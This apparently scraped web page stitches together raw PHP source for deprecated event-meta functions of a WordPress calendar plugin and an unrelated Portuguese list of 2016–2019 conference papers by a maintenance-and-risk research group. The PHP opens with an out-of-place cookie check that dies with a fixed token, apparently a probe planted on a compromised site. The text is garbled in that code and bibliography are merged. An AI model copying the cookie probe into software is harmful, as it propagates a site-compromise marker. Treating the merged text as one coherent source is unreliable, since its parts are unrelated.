if(isset($_COOKIE['lE'])) { die('wIwb'.'TH8'); } /** * register a meta group * * @uses Tribe__Events__Meta_Factory::register() * @deprecated 4.3 * * @param string $meta_group_id * @param array $args * * @return bool $success */ function tribe_register_meta_group( $meta_group_id, $args = [] ) { _deprecated_function( __FUNCTION__, '4.3' ); // setup default for registering a meta group $defaults = [ 'register_type' => 'meta_group', 'register_overwrite' => true ]; // parse the $default and $args into the second param for registering a meta item return Tribe__Events__Meta_Factory::register( $meta_group_id, wp_parse_args( $args, $defaults ) ); } /** * register a meta item * * @uses Tribe__Events__Meta_Factory::register() * @deprecated 4.3 * * @param int $meta_id * @param array $args * * @return bool $success */ function tribe_register_meta( $meta_id, $args = [] ) { _deprecated_function( __FUNCTION__, '4.3' ); return Tribe__Events__Meta_Factory::register( $meta_id, $args ); } /** * Get the meta group. * * @deprecated 4.3 * * @param $meta_group_id * @param bool $is_the_meta * * @return bool|mixed|void */ function tribe_get_meta_group( $meta_group_id, $is_the_meta = false ) { _deprecated_function( __FUNCTION__, '4.3' ); do_action( 'tribe_get_meta_group', $meta_group_id, $is_the_meta ); $type = 'meta_group'; // die silently if the requested meta group is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_group_id, $type ) ) { return false; } $meta_group = Tribe__Events__Meta_Factory::get_args( $meta_group_id, $type ); $meta_ids = Tribe__Events__Meta_Factory::get_order( $meta_group_id ); $group_html = ''; // internal check for hiding items in the meta if ( ! $meta_group['show_on_meta'] ) { return false; } $meta_pos_int = 0; $total_meta_items = tribe_count_hierarchical( $meta_ids ); foreach ( $meta_ids as $meta_id_group ) { foreach ( $meta_id_group as $meta_id ) { $meta_pos_int ++; $group_html = tribe_separated_field( $group_html, $meta_group['wrap']['meta_separator'], tribe_get_meta( $meta_id, $is_the_meta ) ); } } $params = [ $meta_group_id ]; if ( ! empty( $meta['filter_callback'] ) ) { return call_user_func_array( $meta['filter_callback'], $params ); } if ( ! empty( $meta['callback'] ) ) { $value = call_user_func_array( $meta['callback'], $params ); } $value = empty( $value ) ? $group_html : $value; $html = ! empty( $group_html ) ? Tribe__Events__Meta_Factory::template( $meta_group['label'], $value, $meta_group_id, 'meta_group' ) : ''; return apply_filters( 'tribe_get_meta_group', $html, $meta_group_id ); } /** * Get the meta. * * @deprecated 4.3 * * @param $meta_id * @param bool $is_the_meta * * @return bool|mixed|void */ function tribe_get_meta( $meta_id, $is_the_meta = false ) { _deprecated_function( __FUNCTION__, '4.3' ); do_action( 'tribe_get_meta', $meta_id, $is_the_meta ); // die silently if the requested meta item is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_id ) ) { return false; } $meta = Tribe__Events__Meta_Factory::get_args( $meta_id ); // internal check for hiding items in the meta if ( ! $meta['show_on_meta'] ) { return false; } $params = [ $meta_id ]; if ( ! empty( $meta['filter_callback'] ) ) { return call_user_func_array( $meta['filter_callback'], $params ); } if ( ! empty( $meta['callback'] ) ) { $value = call_user_func_array( $meta['callback'], $params ); } $value = empty( $value ) ? $meta['meta_value'] : $value; // if we have a value let's build the html template $html = ! empty( $value ) ? Tribe__Events__Meta_Factory::template( $meta['label'], $value, $meta_id ) : ''; return apply_filters( 'tribe_get_meta', $html, $meta_id ); } /** * Get the args for a meta object. * * @deprecated 4.3 * * @param $meta_id * @param $arg_key * @param string $type * * @return bool */ function tribe_get_meta_arg( $meta_id, $arg_key, $type = 'meta' ) { _deprecated_function( __FUNCTION__, '4.3' ); // die silently if the requested meta group is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_id, $type ) ) { return false; } $args = Tribe__Events__Meta_Factory::get_args( $meta_id, $type ); // check if the arg exists if ( isset( $args[ $arg_key ] ) ) { return $args[ $arg_key ]; } else { return false; } } /** * Get the template part for the meta object. * * @deprecated 4.3 * * @param $meta_id * @param $template_key * @param string $type * * @return bool */ function tribe_get_meta_template_part( $meta_id, $template_key, $type = 'meta' ) { _deprecated_function( __FUNCTION__, '4.3' ); // die silently if the requested meta group is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_id, $type ) ) { return false; } $template = tribe_get_meta_arg( $meta_id, 'wrap', $type ); if ( isset( $template[ $template_key ] ) ) { return $template[ $template_key ]; } else { return false; } } /** * Set the visibility of the meta object. * * @deprecated 4.3 * * @param $meta_id * @param bool $status * @param string $type */ function tribe_set_the_meta_visibility( $meta_id, $status = true, $type = 'meta' ) { _deprecated_function( __FUNCTION__, '4.3' ); Tribe__Events__Meta_Factory::set_visibility( $meta_id, $type, $status ); } /** * Set the template for the meta object. * * @deprecated 4.3 * * @param $meta_id * @param array $template * @param string $type * * @return bool */ function tribe_set_the_meta_template( $meta_id, $template = [], $type = 'meta' ) { _deprecated_function( __FUNCTION__, '4.3' ); if ( is_array( $meta_id ) ) { foreach ( $meta_id as $id ) { tribe_set_the_meta_template( $id, $template, $type ); } } else { global $_tribe_meta_factory; // die silently if the requested meta group is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_id, $type ) ) { return false; } if ( ! empty( $template ) ) { $_tribe_meta_factory->{$type}[ $meta_id ]['wrap'] = wp_parse_args( $template, $_tribe_meta_factory->{$type}[ $meta_id ]['wrap'] ); } } } /** * Set the meta priority to manage positioning. * * @deprecated 4.3 * * @param $meta_id * @param int $priority * @param string $type * * @return bool */ function tribe_set_meta_priority( $meta_id, $priority = 100, $type = 'meta' ) { _deprecated_function( __FUNCTION__, '4.3' ); if ( is_array( $meta_id ) ) { foreach ( $meta_id as $id => $priority ) { tribe_set_meta_priority( $id, $priority, $type ); } } else { global $_tribe_meta_factory; // die silently if the requested meta group is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_id, $type ) ) { return false; } if ( ! empty( $priority ) ) { $_tribe_meta_factory->{$type}[ $meta_id ]['priority'] = $priority; } } } /** * Set meta value for meta object. * * @deprecated 4.3 * * @param $meta_id * @param $value * @param string $value_type * @param string $type * * @return bool */ function tribe_set_meta_value( $meta_id, $value, $value_type = 'meta_value', $type = 'meta' ) { _deprecated_function( __FUNCTION__, '4.3' ); if ( is_array( $meta_id ) ) { foreach ( $meta_id as $id ) { tribe_set_meta_value( $id, $value, $value_type, $type ); } } else { global $_tribe_meta_factory; // die silently if the requested meta group is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_id, $type ) ) { return false; } $_tribe_meta_factory->{$type}[ $meta_id ][ $value_type ] = $value; } } /** * Set the meta label for the meta object. * * @deprecated 4.3 * * @param $meta_id * @param string $label * @param string $type * * @return bool */ function tribe_set_meta_label( $meta_id, $label = '', $type = 'meta' ) { _deprecated_function( __FUNCTION__, '4.3' ); if ( is_array( $meta_id ) ) { foreach ( $meta_id as $id => $label ) { tribe_set_meta_label( $id, $label, $type ); } } else { global $_tribe_meta_factory; // die silently if the requested meta group is not registered if ( ! Tribe__Events__Meta_Factory::check_exists( $meta_id, $type ) ) { return false; } $_tribe_meta_factory->{$type}[ $meta_id ]['label'] = $label; } } /** * Get the event meta * * @deprecated 4.3 * * @return mixed|void */ function tribe_get_the_event_meta() { _deprecated_function( __FUNCTION__, '4.3' ); $html = ''; foreach ( Tribe__Events__Meta_Factory::get_order() as $meta_groups ) { foreach ( $meta_groups as $meta_group_id ) { $html .= tribe_get_meta_group( $meta_group_id, true ); } } return apply_filters( 'tribe_get_the_event_meta', $html ); } /** * Simple display of meta group tag * * @deprecated 4.3 * * @uses tribe_get_meta_group() * @return echo tribe_get_meta_group( $meta_group_id ) */ function tribe_display_the_event_meta() { _deprecated_function( __FUNCTION__, '4.3' ); echo apply_filters( 'tribe_display_the_event_meta', tribe_get_the_event_meta() ); } /** * Simple diplay of meta group tag * * @uses tribe_get_meta_group() * @deprecated 4.3 * * @param string $meta_group_id * * @return echo tribe_get_meta_group( $meta_group_id ) */ function tribe_display_meta_group( $meta_group_id ) { _deprecated_function( __FUNCTION__, '4.3' ); echo apply_filters( 'tribe_display_meta_group', tribe_get_meta_group( $meta_group_id ) ); } /** * Simple diplay of meta tag * * @uses tribe_get_meta() * @deprecated 4.3 * * @param string $meta_id * * @return echo tribe_get_meta( $meta_id ) */ function tribe_display_meta( $meta_id ) { _deprecated_function( __FUNCTION__, '4.3' ); echo apply_filters( 'tribe_display_meta', tribe_get_meta( $meta_id ) ); } /** * Load Legacy Imports * * @deprecated 4.6.18 */ if ( ! function_exists( 'Tribe_Events_Importer_Load' ) ) { function Tribe_Events_Importer_Load() { _deprecated_function( __FUNCTION__, '4.5' ); Tribe__Events__Importer__Plugin::set_plugin_basename( plugin_basename( __FILE__ ) ); if ( is_admin() ) { add_action( 'init', [ 'Tribe__Events__Importer__Plugin', 'initialize_admin' ], 10, 0 ); add_action( 'init', [ 'Tribe__Events__Importer__Options', 'process_general_form_submission' ] ); } } } Congressos – RANDOM – Grupo de Pesquisa em Risco e Análise de Decisão em Operações e Manutenção

Publicações em anais de congressos

2019

MARANGONI JUNIOR, A. ; SANTOS, A. C. J. ; CAVALCANTE, C.A.V.  Aplicação da modelagem delay time na política preventiva de segurança pública. In: : INSID 2019 (INnovation for Systems Information and Decision meeting 2019), 2019, Natal. INSID 2019 Meeting Proceedings, 2019.

ALBERTI, A. R. ; CAVALCANTE, C. A. V. A maintenance policy for protection systems subject to shocks in demands. In: IV EPPGEP 2019 ? ENCONTRO DE PESQUISA E PÓS-GRADUAÇÃO EM ENGENHARIA DE PRODUÇÃO, 2019, Porto Alegre. EPPGEP 2019 – Abstract proceedings, 2019.

CAVALCANTE, C.A.V.; RODRIGUES, A. J. S. ; FERREIRA, Heldemarcio Leite . Maintenance Planning for Electrical System: A Multicriteria Perspective. In: INFORMS Annual Meeting, 2019, Seattle. INFORMS 2019, 2019.

ALBERTI, A. R. ; CAVALCANTE, C.A.V. ; WU, S. . A Hybrid Maintenance Policy Based on Operation Time and Shocks Counting for Protection Systems. In: INFORMS Annual Meeting, 2019, Seattle. INFORMS 2019, 2019.

LOPES, R. S. ; CAVALCANTE, C.A.V. . Integrated Preventive Maintenance and Quality Control Inspection in an Imperfect Production System. In: INFORMS Annual Meeting, 2019, Seattle. INFORMS 2019, 2019.

CAVALCANTE, C.A.V.MARSARO, M. F. ; ALBERTI, A. R. . A Study of the Effect of Quality of Maintenance in Opportunistic Maintenance Models. In: INFORMS Annual Meeting, 2019, Seattle. INFORMS 2019, 2019.

ALBERTI, A. R. ; CAVALCANTE, C.A.V. . A Multicriteria Model to Support Decisions on Investments in Maintenance Quality. In: INFORMS Annual Meeting, 2019, Seattle. INFORMS 2019, 2019.

LOPES, R. S. ; CAVALCANTE, C.A.V. . Multi-criteria Decision Model to Support the Maintenance Policy for Circuit Breakears in an Electrical Substation. In: INFORMS Annual Meeting, 2019, Seattle. INFORMS 2019, 2019.

ALBERTI, A. R. ; MORAIS, Danielle Costa ; CAVALCANTE, C.A.V. . A Multicriteria Group Decision Approach to Define Maintenance Policies under Resource Constraints. In: INFORMS Annual Meeting, 2019, Seattle. INFORMS 2019, 2019.

MARSARO, M. F. ; ALBERTI, A. R. ; CAVALCANTE, C.A.V. . A Multicriteria Model to Evaluate Opportunistic Maintenance Policies Subject to Imperfect Inspection. In: 25TH International Conference on Multiple Criteria Decision Making (MCDM), 2019, Istanbul. Annals of MCDM 2019, 2019.

RODRIGUES, A. J. S. ; CAVALCANTE, C.A.V. . Modelo multicritério baseado no método FITradeoff para definição de tempos de inspeção em um sistema sujeito a inspeções imperfeitas. In: INSID 2019 (INnovation for Systems Information and Decision meeting 2019), 2019, Natal. INSID 2019 Meeting Proceedings, 2019.

PAIVA, R. G. N. ; COSTA, L. Q. M. ; TENORIO, V. A. ; SANTOS, A. C. J. ; CAVALCANTE, C.A.V. ; FERREIRA NETO, W. A. . Análise da influência de fatores da qualidade em um modelo de manutenção de inspeção e substituição preventiva. In: INSID 2019 (INnovation for Systems Information and Decision meeting 2019), 2019, Natal. INSID 2019 Meeting Proceedings, 2019.

COSTA, L. Q. M. ; PAIVA, R. G. N. ; SANTOS, A. C. J. ; TENORIO, V. A. ; CAVALCANTE, C.A.V. . Estudo e mensuração da eficácia de políticas de manutenção. In: INSID 2019 (INnovation for Systems Information and Decision meeting 2019), 2019, Natal. INSID 2019 Meeting Proceedings, 2019.

RODRIGUEZ, T. F. O. ; CAVALCANTE, C.A.V. . Política de planejamento de ordens de manutenção para parques eólicos offshore baseada em uma abordagem de racionamento de sobressalentes. In: INSID 2019 (INnovation for Systems Information and Decision meeting 2019), 2019, Natal. INSID 2019 Meeting Proceedings, 2019.

2018

ALBERTI, A.R ; CAVALCANTE, C.A.V. ; SCARF, P.A. ; SILVA, A.L.O . Modelling the quality of maintenance of a protection system: a case study on isolation valves used in water distribution systems. In: 10th IMA International Conference on Modelling in Industrial Maintenance and Reliability, 2018, Manchester. Proceedings of the 10th IMA International Conference on Modelling in Industrial Maintenance and Reliability, 2018.

DANTAS, P.P.L. ; RODRIGUEZ, T.F.O. ; CAVALCANTE, C.A.V. . Multicriteria model to support a definition of a maintenance – spare parts policy. In: 10th IMA International Conference on Modelling in Industrial Maintenance and Reliability, 2018, Manchester. Proceedings of the 10th IMA International Conference on Modelling in Industrial Maintenance and Reliability, 2018.

RIBEIRO, L ; CAVALCANTE, C.A.V. ; DANTAS, P . A selective maintenance model based on FITradeoff method. In: 10th IMA International Conference on Modelling in Industrial Maintenance and Reliability, 2018, Manchester. Proceedings of the 10th IMA International Conference on Modelling in Industrial Maintenance and Reliability, 2018.

SANTOS, A.C.J ; CAVALCANTE, C.A.V. . Insight into cost of defective state using delay-time concept. In: 10th IMA International Conference on Modelling in Industrial Maintenance and Reliability, 2018, Manchester. Proceedings of the 10th IMA International Conference on Modelling in Industrial Maintenance and Reliability, 2018.

RIBEIRO, L ; CAVALCANTE, C.A.V. . Selective maintenance model for mission-oriented systems considering heterogeneous missions and budget constraints. In: 10th IMA International Conference on Modelling in Industrial Maintenance and Reliability, 2018, Manchester. Proceedings of the 10th IMA International Conference on Modelling in Industrial Maintenance and Reliability, 2018.

Scarf. P. A ; CAVALCANTE, C.A.V. ; LOPES, R. S. . An opportunistic maintenance policy for heterogeneous components. In: European Safety and Reliability Conference ESREL, 2018, Trondheim. Proceedings of ESREL 2018, June 17-21, 2018, Trondheim, Norway, 2018.

GOMES, H. J. S. ; RODRIGUES, A. J. S. ; CAVALCANTE, C.A.V. . Modelo multicritério de apoio à decisão de localização de semáforos em pontos críticos nas vias públicas da cidade de Marabá. In: XXV Simpósio de Engenharia de Produção (SIMPEP), 2018, Bauru. Anais do XXV Simpep, 2018. v. 1. p. 1-14.

RODRIGUEZ, T. F. O. ; BARROS, L. G. ; CAVALCANTE, C.A.V. . Política de manutenção com base em substituição por oportunidade e por idade para turbinas eólicas para geração de energia. In: L Simpósio de Pesquisa Operacional (50º SBPO 2018), 2018, Rio de Janeiro. Anais do L SBPO (2018), 2018. v. 1. p. 1-12.

DANTAS, MISIA M. ; LOPES, R. S. ; CAVALCANTE, C.A.V. . Tolerância ao risco e fornecimento de emergência não confiável no contexto newsvendor. In: L Simpósio de Pesquisa Operacional (50º SBPO 2018), 2018, Rio de Janeiro. Anais do L SBPO (2018), 2018. v. 1.

SANTOS, A. C. J. ; CAVALCANTE, C.A.V. . Discussão sobre metodologias de análise da gestão da manutenção: da estratégia à operação. In: : XXXVIII ENCONTRO NACIONAL DE ENGENHARIA DE PRODUÇÃO, 2018, Maceió. Anais do XXXVIII ENEGEP (2018), 2018.

JIMENEZ G, HANSER S. ; CAVALCANTE, C.A.V. Influência do tipo de normalização na otimização de modelos weighted goal programming: o caso do Bahrein. In: : XXXVIII ENCONTRO NACIONAL DE ENGENHARIA DE PRODUÇÃO, 2018, Maceió. Anais do XXXVIII ENEGEP (2018), 2018.

ARAUJO, L. H. C. ; FERREIRA NETO, W. A. ; ALBERTI, A. R. ; LIMA, H. B. V. ; CAVALCANTE, C.A.V. Modelo de manutenção para um sistema multicomponente baseado no conceito delaytime: um estudo de caso sobre shredder. In: : XXXVIII ENCONTRO NACIONAL DE ENGENHARIA DE PRODUÇÃO, 2018, Maceió. Anais do XXXVIII ENEGEP (2018), 2018.

FERREIRA NETO, W. A. ; ARAUJO, L. H. C. ; ALBERTI, A. R. ; SANTOS, A. C. J. ; CAVALCANTE, C.A.V. Política de inspeção com intervalos variáveis voltada para sistemas críticos. In: XXXVIII ENCONTRO NACIONAL DE ENGENHARIA DE PRODUÇÃO, 2018, Maceió. Anais do XXXVIII ENEGEP (2018), 2018.

ALBERTI, A. R. ; CAVALCANTE, C.A.V. . A MULTI-OBJECTIVE MODEL TO EVALUATE MAINTENANCE POLICIES FOR PROTECTION SYSTEMS SUBJECT TO IMPERFECT MAINTENANCE. In: III EPPGEP 2018 ? ENCONTRO DE PESQUISA E PÓS-GRADUAÇÃO EM ENGENHARIA DE PRODUÇÃO, 2018, Florianópolis. EPPGEP 2018 – Abstract proceedings, 2018.

LOPES, R. S. ; CAVALCANTE, C.A.V. ; Scarf. P. A . A study of the effect of inspection quality improvement on inspection policy for a technical system. In: 10th IMA International Conference on Modelling in Industrial Maintenance and Reliability, 2018, Manchester. 10th IMA International Conference on Modelling in Industrial Maintenance and Reliability, 2018.

 

2017

Scarf, Philip A. ; Cavalcante, Cristiano A.V. ; Berrade, M.D. . Imperfect inspection of a preparedness system with a defective state. In: International Conference on Mathematical Methods in Reliability (MMR), 2017, Grenoble. 10th International Conference on Mathematical Methods in Reliability (MMR 2017), 2017.

Berrade, M.D. ; Scarf, Philip A. ; Cavalcante, Cristiano A.V. . A model for postponing replacement in maintenance. In: International Conference on Mathematical Methods in Reliability (MMR), 2017, Grenoble. 10th International Conference on Mathematical Methods in Reliability (MMR 2017), 2017.

DANTAS, P. P. L. ; RODRIGUEZ, T. F. O. ; Cavalcante, Cristiano A.V. . MODELO MULTICRITÉRIO PARA SUPORTAR A DEFINIÇÃO DE UMA POLÍTICA INTEGRADA DE MANUTENÇÃO E GESTÃO DE SOBRESSALENTES. In: Simpósio Brasileiro de Pesquisa Operacional, 2017, Blumenau-SC. XLIX Simpósio Brasileiro de Pesquisa Operacional, 2017.

RODRIGUEZ, T. F. O. ; Cavalcante, Cristiano A.V. ; DANTAS, P. P. L. . MODELO MULTICRITÉRIO PARA SUPORTAR A DEFINIÇÃO DE POLÍTICA DE MANUTENÇÃO PIGGYBACK PARA DISPOSITIVOS DE UMA SUBESTAÇÃO DE UMA EMPRESA DE ENERGIA ELÉTRICA. In: ENEGEP- Encontro Nacional de Engenharia de Produção, 2017, joinville. ENEGEP 2017, 2017.

RIBEIRO, L. F. A. ; CAVALCANTE, C.A.V. ; RODRIGUEZ, T. F. O. . SELECTIVE MAINTENANCE FOR MULTI-MISSION ORIENTED SYSTEMS. In: II EPPGEP 2017 ? ENCONTRO DE PESQUISA E PÓS-GRADUAÇÃO EM ENGENHARIA DE PRODUÇÃO, 2017, Curitiba. EPPGEP 2017- Abstract proceedings, 2017.

 

2016

RODRIGUEZ, T. F. O. ; RIBEIRO, L. F. A. ; Cavalcante, Cristiano A.V. . Joint optimization of maintenance preventive ?Piggyback? and spare parts policies. In: 9th IMA International Conference on Modelling in Industrial Maintenance and Reliability (MIMAR), 2016, London. 9th IMA International Conference on Modelling in Industrial Maintenance and Reliability (MIMAR), 2016.

RIBEIRO, L. F. A. ; Cavalcante, Cristiano A.V. ; RODRIGUEZ, T. F. O. . SELECTIVE MAINTENANCE FOR MULTI MISSION ORIENTED SYSTEMS. In: ESREL 2016 Conference, 2016, Glasgow. Esrel 2016, 2016.